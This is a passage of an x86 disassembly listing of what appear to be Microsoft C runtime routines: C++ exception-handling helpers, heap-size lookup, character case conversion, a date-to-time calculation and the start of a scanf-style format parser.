push [ebp+arg_10]
call sub_418123
add esp, 14h
mov esi, eax
loc_41CF39: ; CODE XREF: sub_41CEEC+A2�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jnb short loc_41CF90
cmp edi, [esi]
jl short loc_41CF88
cmp edi, [esi+4]
jg short loc_41CF88
mov eax, [esi+0Ch]
mov ecx, [esi+10h]
shl eax, 4
add eax, ecx
mov ecx, [eax-0Ch]
test ecx, ecx
jz short loc_41CF62
cmp byte ptr [ecx+8], 0
jnz short loc_41CF88
loc_41CF62: ; CODE XREF: sub_41CEEC+6E�j
push 1
add eax, 0FFFFFFF0h
push [ebp+arg_1C]
push [ebp+arg_18]
push esi
push 0
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41D0A5
add esp, 2Ch
loc_41CF88: ; CODE XREF: sub_41CEEC+57�j
; sub_41CEEC+5C�j ...
inc [ebp+var_4]
add esi, 14h
jmp short loc_41CF39
; ---------------------------------------------------------------------------
loc_41CF90: ; CODE XREF: sub_41CEEC+2F�j
; sub_41CEEC+53�j
pop edi
pop esi
leave
retn
sub_41CEEC endp
; =============== S U B R O U T I N E =======================================
sub_41CF94 proc near ; CODE XREF: sub_41CD45+10F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_0]
mov eax, [edi+4]
test eax, eax
jz short loc_41CFEB
cmp byte ptr [eax+8], 0
lea edx, [eax+8]
jz short loc_41CFEB
mov esi, [esp+8+arg_4]
mov ecx, [esi+4]
cmp eax, ecx
jz short loc_41CFC5
add ecx, 8
push ecx
push edx
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_41CFE7
loc_41CFC5: ; CODE XREF: sub_41CF94+1F�j
test byte ptr [esi], 2
jz short loc_41CFCF
test byte ptr [edi], 8
jz short loc_41CFE7
loc_41CFCF: ; CODE XREF: sub_41CF94+34�j
mov eax, [esp+8+arg_8]
mov eax, [eax]
test al, 1
jz short loc_41CFDE
test byte ptr [edi], 1
jz short loc_41CFE7
loc_41CFDE: ; CODE XREF: sub_41CF94+43�j
test al, 2
jz short loc_41CFEB
test byte ptr [edi], 2
jnz short loc_41CFEB
loc_41CFE7: ; CODE XREF: sub_41CF94+2F�j
; sub_41CF94+39�j ...
xor eax, eax
jmp short loc_41CFEE
; ---------------------------------------------------------------------------
loc_41CFEB: ; CODE XREF: sub_41CF94+B�j
; sub_41CF94+14�j ...
push 1
pop eax
loc_41CFEE: ; CODE XREF: sub_41CF94+55�j
pop edi
pop esi
retn
sub_41CF94 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CFF1 proc near ; CODE XREF: sub_41CCAA+34�p
; sub_41D0A5+42�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_424860
push offset sub_41F774
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ebx, [ebp+arg_0]
mov esi, [ebx+8]
mov [ebp+var_1C], esi
mov edi, [ebp+arg_8]
loc_41D023: ; CODE XREF: sub_41CFF1+8A�j
cmp esi, [ebp+arg_C]
jz short loc_41D07D
cmp esi, 0FFFFFFFFh
jle short loc_41D032
cmp esi, [edi+4]
jl short loc_41D037
loc_41D032: ; CODE XREF: sub_41CFF1+3A�j
call sub_41D552
loc_41D037: ; CODE XREF: sub_41CFF1+3F�j
and [ebp+var_4], 0
mov eax, [edi+8]
mov eax, [eax+esi*8+4]
test eax, eax
jz short loc_41D052
push 103h
push ebx
push eax
call sub_41D4B0
loc_41D052: ; CODE XREF: sub_41CFF1+53�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41D072
; ---------------------------------------------------------------------------
push [ebp+var_14]
call sub_41D08F
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov esi, [ebp+var_1C]
loc_41D072: ; CODE XREF: sub_41CFF1+65�j
mov eax, [edi+8]
mov esi, [eax+esi*8]
mov [ebp+var_1C], esi
jmp short loc_41D023
; ---------------------------------------------------------------------------
loc_41D07D: ; CODE XREF: sub_41CFF1+35�j
mov [ebx+8], esi
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41CFF1 endp
; =============== S U B R O U T I N E =======================================
sub_41D08F proc near ; CODE XREF: sub_41CFF1+6A�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jz short loc_41D0A0
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41D0A0: ; CODE XREF: sub_41D08F+C�j
jmp sub_41D4FC
sub_41D08F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D0A5 proc near ; CODE XREF: sub_41CD45+151�p
; sub_41CEEC+94�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
cmp [ebp+arg_18], 0
push ebx
mov ebx, [ebp+arg_14]
push esi
push edi
mov edi, [ebp+arg_4]
jz short loc_41D0C7
push [ebp+arg_18]
push ebx
push edi
push [ebp+arg_0]
call sub_41D256
add esp, 10h
loc_41D0C7: ; CODE XREF: sub_41D0A5+10�j
cmp [ebp+arg_24], 0
push [ebp+arg_0]
jnz short loc_41D0D3
push edi
jmp short loc_41D0D6
; ---------------------------------------------------------------------------
loc_41D0D3: ; CODE XREF: sub_41D0A5+29�j
push [ebp+arg_24]
loc_41D0D6: ; CODE XREF: sub_41D0A5+2C�j
call sub_417EFC
mov esi, [ebp+arg_1C]
push dword ptr [esi]
push [ebp+arg_10]
push [ebp+arg_C]
push edi
call sub_41CFF1
mov eax, [esi+4]
push 100h
push [ebp+arg_20]
inc eax
mov [edi+8], eax
push dword ptr [ebx+0Ch]
push [ebp+arg_10]
push [ebp+arg_8]
push edi
push [ebp+arg_0]
call sub_41D120
add esp, 2Ch
test eax, eax
jz short loc_41D11B
push edi
push eax
call sub_417EBA
loc_41D11B: ; CODE XREF: sub_41D0A5+6D�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41D0A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D120 proc near ; CODE XREF: sub_41D0A5+63�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_424870
push offset sub_41F774
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, [ebp+arg_10]
mov [ebp+var_2C], eax
xor ebx, ebx
mov [ebp+var_24], ebx
mov esi, [ebp+arg_4]
mov ecx, [esi-4]
mov [ebp+var_28], ecx
mov ecx, ds:dword_48A090
mov [ebp+var_1C], ecx
mov ecx, ds:dword_48A094
mov [ebp+var_20], ecx
mov edi, [ebp+arg_0]
mov ds:dword_48A090, edi
mov ecx, [ebp+arg_8]
mov ds:dword_48A094, ecx
mov [ebp+var_4], ebx
mov [ebp+var_4], 1
push [ebp+arg_18]
push [ebp+arg_14]
push eax
push [ebp+arg_C]
push esi
call sub_417F81
add esp, 14h
mov [ebp+var_2C], eax
mov [ebp+var_4], ebx
or [ebp+var_4], 0FFFFFFFFh
call sub_41D1E6
mov eax, [ebp+var_2C]
loc_41D1AD: ; CODE XREF: sub_41D1C6+16�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41D120 endp
; =============== S U B R O U T I N E =======================================
sub_41D1BC proc near ; DATA XREF: _1:00424880�o
push dword ptr [ebp-14h]
call sub_41D22C
pop ecx
retn
sub_41D1BC endp
; =============== S U B R O U T I N E =======================================
sub_41D1C6 proc near ; DATA XREF: _1:00424884�o
mov esp, [ebp-18h]
and dword ptr [ebp-2Ch], 0
push 0FFFFFFFFh
lea eax, [ebp-10h]
push eax
call sub_4181E2
pop ecx
pop ecx
xor eax, eax
jmp short loc_41D1AD
sub_41D1C6 endp
; ---------------------------------------------------------------------------
loc_41D1DE: ; DATA XREF: _1:00424878�o
xor ebx, ebx
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
; =============== S U B R O U T I N E =======================================
sub_41D1E6 proc near ; CODE XREF: sub_41D120+85�p
mov eax, [ebp-28h]
mov [esi-4], eax
mov eax, [ebp-1Ch]
mov ds:dword_48A090, eax
mov eax, [ebp-20h]
mov ds:dword_48A094, eax
cmp dword ptr [edi], 0E06D7363h
jnz short locret_41D22B
cmp dword ptr [edi+10h], 3
jnz short locret_41D22B
cmp dword ptr [edi+14h], 19930520h
jnz short locret_41D22B
cmp [ebp-24h], ebx
jnz short locret_41D22B
cmp [ebp-2Ch], ebx
jz short locret_41D22B
call sub_41824A
push eax
push edi
call sub_41D41A
pop ecx
pop ecx
locret_41D22B: ; CODE XREF: sub_41D1E6+1C�j
; sub_41D1E6+22�j ...
retn
sub_41D1E6 endp
; =============== S U B R O U T I N E =======================================
sub_41D22C proc near ; CODE XREF: sub_41D1BC+3�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41D253
cmp dword ptr [eax+10h], 3
jnz short loc_41D253
cmp dword ptr [eax+14h], 19930520h
jnz short loc_41D253
cmp dword ptr [eax+1Ch], 0
jnz short loc_41D253
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41D253: ; CODE XREF: sub_41D22C+C�j
; sub_41D22C+12�j ...
xor eax, eax
retn
sub_41D22C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D256 proc near ; CODE XREF: sub_41D0A5+1A�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_424888
push offset sub_41F774
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ecx, [ebp+arg_8]
mov eax, [ecx+4]
test eax, eax
jz loc_41D3FF
cmp byte ptr [eax+8], 0
jz loc_41D3FF
mov eax, [ecx+8]
test eax, eax
jz loc_41D3FF
mov edx, [ebp+arg_4]
lea edi, [eax+edx+0Ch]
and [ebp+var_4], 0
test byte ptr [ecx], 8
jz short loc_41D2F3
mov esi, [ebp+arg_0]
push 1
push dword ptr [esi+18h]
call sub_4208D2
pop ecx
pop ecx
test eax, eax
jz loc_41D3F6
push 1
push edi
call sub_4208EE
pop ecx
pop ecx
test eax, eax
jz loc_41D3F6
mov eax, [esi+18h]
mov [edi], eax
mov ecx, [ebp+arg_C]
add ecx, 8
push ecx
loc_41D2E4: ; CODE XREF: sub_41D256+F5�j
push eax
call sub_41D481
pop ecx
pop ecx
mov [edi], eax
jmp loc_41D3FB
; ---------------------------------------------------------------------------
loc_41D2F3: ; CODE XREF: sub_41D256+57�j
mov esi, [ebp+arg_C]
test byte ptr [esi], 1
jz short loc_41D34D
mov ebx, [ebp+arg_0]
push 1
push dword ptr [ebx+18h]
call sub_4208D2
pop ecx
pop ecx
test eax, eax
jz loc_41D3F6
push 1
push edi
call sub_4208EE
pop ecx
pop ecx
test eax, eax
jz loc_41D3F6
push dword ptr [esi+14h]
push dword ptr [ebx+18h]
push edi
call sub_4182C0
add esp, 0Ch
cmp dword ptr [esi+14h], 4
jnz loc_41D3FB
mov eax, [edi]
test eax, eax
jz loc_41D3FB
add esi, 8
push esi
jmp short loc_41D2E4
; ---------------------------------------------------------------------------
loc_41D34D: ; CODE XREF: sub_41D256+A3�j
cmp dword ptr [esi+18h], 0
mov ebx, [ebp+arg_0]
push 1
push dword ptr [ebx+18h]
jnz short loc_41D395
call sub_4208D2
pop ecx
pop ecx
test eax, eax
jz loc_41D3F6
push 1
push edi
call sub_4208EE
pop ecx
pop ecx
test eax, eax
jz short loc_41D3F6
push dword ptr [esi+14h]
add esi, 8
push esi
push dword ptr [ebx+18h]
call sub_41D481
pop ecx
pop ecx
push eax
push edi
call sub_4182C0
add esp, 0Ch
jmp short loc_41D3FB
; ---------------------------------------------------------------------------
loc_41D395: ; CODE XREF: sub_41D256+103�j
call sub_4208D2
pop ecx
pop ecx
test eax, eax
jz short loc_41D3F6
push 1
push edi
call sub_4208EE
pop ecx
pop ecx
test eax, eax
jz short loc_41D3F6
push dword ptr [esi+18h]
call sub_42090A
pop ecx
test eax, eax
jz short loc_41D3F6
test byte ptr [esi], 4
jz short loc_41D3DC
push 1
lea eax, [esi+8]
push eax
push dword ptr [ebx+18h]
call sub_41D481
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push edi
call sub_417EF5
jmp short loc_41D3FB
; ---------------------------------------------------------------------------
loc_41D3DC: ; CODE XREF: sub_41D256+168�j
lea eax, [esi+8]
push eax
push dword ptr [ebx+18h]
call sub_41D481
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push edi
call sub_417EEE
jmp short loc_41D3FB
; ---------------------------------------------------------------------------
loc_41D3F6: ; CODE XREF: sub_41D256+6A�j
; sub_41D256+7C�j ...
call sub_41D552
loc_41D3FB: ; CODE XREF: sub_41D256+98�j
; sub_41D256+E1�j ...
or [ebp+var_4], 0FFFFFFFFh
loc_41D3FF: ; CODE XREF: sub_41D256+2E�j
; sub_41D256+38�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41D256 endp
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_41D4FC
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D41A proc near ; CODE XREF: sub_41CD45+170�p
; sub_41D1E6+3E�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_424898
push offset sub_41F774
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_41D461
mov ecx, [eax+1Ch]
mov ecx, [ecx+4]
test ecx, ecx
jz short loc_41D461
and [ebp+var_4], 0
push ecx
push dword ptr [eax+18h]
call sub_417EEE
or [ebp+var_4], 0FFFFFFFFh
loc_41D461: ; CODE XREF: sub_41D41A+2A�j
; sub_41D41A+34�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41D41A endp
; ---------------------------------------------------------------------------
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_41D4FC
; =============== S U B R O U T I N E =======================================
sub_41D481 proc near ; CODE XREF: sub_41D256+8F�p
; sub_41D256+12C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
mov eax, [ecx]
mov edx, [ecx+4]
add eax, esi
test edx, edx
jl short loc_41D4A2
mov esi, [edx+esi]
mov ecx, [ecx+8]
mov ecx, [esi+ecx]
add ecx, edx
add eax, ecx
loc_41D4A2: ; CODE XREF: sub_41D481+12�j
pop esi
retn
sub_41D481 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D4B0 proc near ; CODE XREF: sub_417F81+40�p
; sub_41CFF1+5C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_41826D
push esi
push edi
call eax
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_41D4EF
mov ecx, 2
loc_41D4EF: ; CODE XREF: sub_41D4B0+38�j
push ecx
call sub_41826D
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_41D4B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D4FC proc near ; CODE XREF: sub_41CD45:loc_41CEE7�j
; sub_41D08F:loc_41D0A0�j ...
var_18 = dword ptr -18h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00420922 SIZE 00000017 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4248A8
push offset sub_41F774
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov eax, ds:dword_48A09C
test eax, eax
jz short loc_41D544
mov [ebp+var_4], 1
call eax
jmp short loc_41D540
; ---------------------------------------------------------------------------
loc_41D539: ; DATA XREF: _1:004248B8�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41D53D: ; DATA XREF: _1:004248BC�o
mov esp, [ebp+var_18]
loc_41D540: ; CODE XREF: sub_41D4FC+3B�j
and [ebp+var_4], 0
loc_41D544: ; CODE XREF: sub_41D4FC+30�j
or [ebp+var_4], 0FFFFFFFFh
call $+5
loc_41D54D: ; DATA XREF: _1:004248B0�o
jmp loc_420922
sub_41D4FC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D552 proc near ; CODE XREF: sub_418123+23�p
; sub_418123:loc_41818E�p ...
var_18 = dword ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4248C0
push offset sub_41F774
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov eax, ds:off_43B924
test eax, eax
jz short loc_41D59A
mov [ebp+var_4], 1
call eax ; sub_41D4FC
jmp short loc_41D596
; ---------------------------------------------------------------------------
loc_41D58F: ; DATA XREF: _1:004248D0�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41D593: ; DATA XREF: _1:004248D4�o
mov esp, [ebp+var_18]
loc_41D596: ; CODE XREF: sub_41D552+3B�j
and [ebp+var_4], 0
loc_41D59A: ; CODE XREF: sub_41D552+30�j
or [ebp+var_4], 0FFFFFFFFh
call $+5
loc_41D5A3: ; DATA XREF: _1:004248C8�o
jmp sub_41D4FC
sub_41D552 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D5A8 proc near ; CODE XREF: sub_418603+7�p
; sub_418603+26�p
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, ds:dword_48B688
push esi
cmp eax, 3
jnz short loc_41D5D1
mov esi, [ebp+arg_0]
push esi
call sub_41AD89
test eax, eax
pop ecx
jz short loc_41D5CE
mov eax, [esi-4]
sub eax, 9
jmp short loc_41D606
; ---------------------------------------------------------------------------
loc_41D5CE: ; CODE XREF: sub_41D5A8+1C�j
push esi
jmp short loc_41D5F8
; ---------------------------------------------------------------------------
loc_41D5D1: ; CODE XREF: sub_41D5A8+E�j
cmp eax, 2
jnz short loc_41D5F5
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
push [ebp+arg_0]
call sub_41BAE4
add esp, 0Ch
test eax, eax
jz short loc_41D5F5
movzx eax, byte ptr [eax]
shl eax, 4
jmp short loc_41D606
; ---------------------------------------------------------------------------
loc_41D5F5: ; CODE XREF: sub_41D5A8+2C�j
; sub_41D5A8+43�j
push [ebp+arg_0]
loc_41D5F8: ; CODE XREF: sub_41D5A8+27�j
push 0
push ds:dword_48B684
call ds:dword_4241C0 ; RtlSizeHeap
loc_41D606: ; CODE XREF: sub_41D5A8+24�j
; sub_41D5A8+4B�j
pop esi
leave
retn
sub_41D5A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D609 proc near ; CODE XREF: sub_4186B1+C9�p
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_0]
sub ebx, 76Ch
cmp ebx, 46h
jl loc_41D6C5
cmp ebx, 8Ah
jg loc_41D6C5
push esi
push edi
mov edi, [ebp+arg_4]
mov esi, ds:dword_43C054[edi*4]
add esi, [ebp+arg_8]
test bl, 3
jnz short loc_41D648
cmp edi, 2
jle short loc_41D648
inc esi
loc_41D648: ; CODE XREF: sub_41D609+37�j
; sub_41D609+3C�j
call sub_420939
mov eax, ebx
lea ecx, [ebx-1]
imul eax, 16Dh
sar ecx, 2
mov edx, esi
mov [ebp+var_8], esi
add edx, ecx
mov [ebp+var_10], ebx
add eax, edx
mov edx, [ebp+arg_14]
lea ecx, [eax+eax*2]
mov eax, [ebp+arg_C]
mov [ebp+var_1C], eax
lea ecx, [eax+ecx*8]
imul ecx, 3Ch
add ecx, [ebp+arg_10]
imul ecx, 3Ch
add ecx, ds:dword_43BF70
dec edi
cmp [ebp+arg_18], 1
mov [ebp+var_14], edi
pop edi
pop esi
lea ecx, [ecx+edx+7C558180h]
mov [ebp+arg_0], ecx
jz short loc_41D6BB
cmp [ebp+arg_18], 0FFFFFFFFh
jnz short loc_41D6C1
cmp ds:dword_43BF74, 0
jz short loc_41D6C1
lea eax, [ebp+var_24]
push eax
call sub_420BAC
pop ecx
mov ecx, [ebp+arg_0]
test eax, eax
jz short loc_41D6C1
loc_41D6BB: ; CODE XREF: sub_41D609+90�j
add ecx, ds:dword_43BF78
loc_41D6C1: ; CODE XREF: sub_41D609+96�j
; sub_41D609+9F�j ...
mov eax, ecx
jmp short loc_41D6C8
; ---------------------------------------------------------------------------
loc_41D6C5: ; CODE XREF: sub_41D609+13�j
; sub_41D609+1F�j
or eax, 0FFFFFFFFh
loc_41D6C8: ; CODE XREF: sub_41D609+BA�j
pop ebx
leave
retn
sub_41D609 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D6CB proc near ; CODE XREF: sub_418833+12B�p
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp ds:dword_48A0A8, 0
push ebx
jnz short loc_41D6F6
mov eax, [ebp+arg_0]
cmp eax, 61h
jl loc_41D794
cmp eax, 7Ah
jg loc_41D794
sub eax, 20h
jmp loc_41D794
; ---------------------------------------------------------------------------
loc_41D6F6: ; CODE XREF: sub_41D6CB+C�j
mov ebx, [ebp+arg_0]
cmp ebx, 100h
jge short loc_41D729
cmp ds:dword_4397AC, 1
jle short loc_41D716
push 2
push ebx
call sub_41A642
pop ecx
pop ecx
jmp short loc_41D721
; ---------------------------------------------------------------------------
loc_41D716: ; CODE XREF: sub_41D6CB+3D�j
mov eax, ds:off_4395A0
mov al, [eax+ebx*2]
and eax, 2
loc_41D721: ; CODE XREF: sub_41D6CB+49�j
test eax, eax
jnz short loc_41D729
loc_41D725: ; CODE XREF: sub_41D6CB+AF�j
mov eax, ebx
jmp short loc_41D794
; ---------------------------------------------------------------------------
loc_41D729: ; CODE XREF: sub_41D6CB+34�j
; sub_41D6CB+58�j
mov edx, ds:off_4395A0
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_41D74C
and byte ptr [ebp+arg_0+2], 0
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
push 2
jmp short loc_41D755
; ---------------------------------------------------------------------------
loc_41D74C: ; CODE XREF: sub_41D6CB+71�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
push 1
loc_41D755: ; CODE XREF: sub_41D6CB+7F�j
pop eax
lea ecx, [ebp+var_4]
push 1
push 0
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push 200h
push ds:dword_48A0A8
call sub_41E709
add esp, 20h
test eax, eax
jz short loc_41D725
cmp eax, 1
jnz short loc_41D787
movzx eax, [ebp+var_4]
jmp short loc_41D794
; ---------------------------------------------------------------------------
loc_41D787: ; CODE XREF: sub_41D6CB+B4�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_41D794: ; CODE XREF: sub_41D6CB+14�j
; sub_41D6CB+1D�j ...
pop ebx
leave
retn
sub_41D6CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D797 proc near ; CODE XREF: sub_418A52+2A�p
var_1C4 = byte ptr -1C4h
var_1C3 = byte ptr -1C3h
var_64 = byte ptr -64h
var_59 = byte ptr -59h
var_44 = dword ptr -44h
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_35 = byte ptr -35h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1C4h
and [ebp+var_15], 0
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
push edi
mov al, [esi]
mov [ebp+var_4], ebx
test al, al
mov [ebp+var_34], ebx
jz loc_41E19D
mov edi, [ebp+arg_0]
jmp short loc_41D7C6
; ---------------------------------------------------------------------------
loc_41D7C1: ; CODE XREF: sub_41D797+9CE�j
mov edi, [ebp+arg_0]
xor ebx, ebx
loc_41D7C6: ; CODE XREF: sub_41D797+28�j
cmp ds:dword_4397AC, 1
jle short loc_41D7DE
movzx eax, al
push 8
push eax
call sub_41A642
pop ecx
pop ecx
jmp short loc_41D7ED
; ---------------------------------------------------------------------------
loc_41D7DE: ; CODE XREF: sub_41D797+36�j
mov ecx, ds:off_4395A0
movzx eax, al
mov al, [ecx+eax*2]
and eax, 8
loc_41D7ED: ; CODE XREF: sub_41D797+45�j
cmp eax, ebx
jz short loc_41D827
dec [ebp+var_4]
push edi
lea eax, [ebp+var_4]
push edi
push eax
call sub_41E224
pop ecx
pop ecx
push eax
call sub_41E20D
movzx eax, byte ptr [esi+1]
inc esi
push eax
call sub_420F60
add esp, 0Ch
loc_41D815: ; CODE XREF: sub_41D797+8E�j
test eax, eax
jz short loc_41D827
movzx eax, byte ptr [esi+1]
inc esi
push eax
call sub_420F60
pop ecx
jmp short loc_41D815
; ---------------------------------------------------------------------------
loc_41D827: ; CODE XREF: sub_41D797+58�j
; sub_41D797+80�j
cmp byte ptr [esi], 25h
jnz loc_41E109
and [ebp+var_35], 0
and [ebp+var_18], 0
and [ebp+var_17], 0
and [ebp+var_E], 0
and [ebp+var_F], 0
and [ebp+var_16], 0
xor edi, edi
and [ebp+var_5], 0
mov [ebp+var_1C], ebx
mov [ebp+var_20], ebx
mov [ebp+var_C], ebx
mov [ebp+var_D], 1
mov [ebp+var_30], ebx
loc_41D85E: ; CODE XREF: sub_41D797+172�j
movzx ebx, byte ptr [esi+1]
inc esi
cmp ds:dword_4397AC, 1
jle short loc_41D87B
movzx eax, bl
push 4
push eax
call sub_41A642
pop ecx
pop ecx
jmp short loc_41D88A
; ---------------------------------------------------------------------------
loc_41D87B: ; CODE XREF: sub_41D797+D3�j
mov ecx, ds:off_4395A0
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_41D88A: ; CODE XREF: sub_41D797+E2�j
test eax, eax
jz short loc_41D8A0
mov eax, [ebp+var_C]
inc [ebp+var_20]
lea eax, [eax+eax*4]
lea eax, [ebx+eax*2-30h]
mov [ebp+var_C], eax
jmp short loc_41D905
; ---------------------------------------------------------------------------
loc_41D8A0: ; CODE XREF: sub_41D797+F5�j
cmp ebx, 4Eh
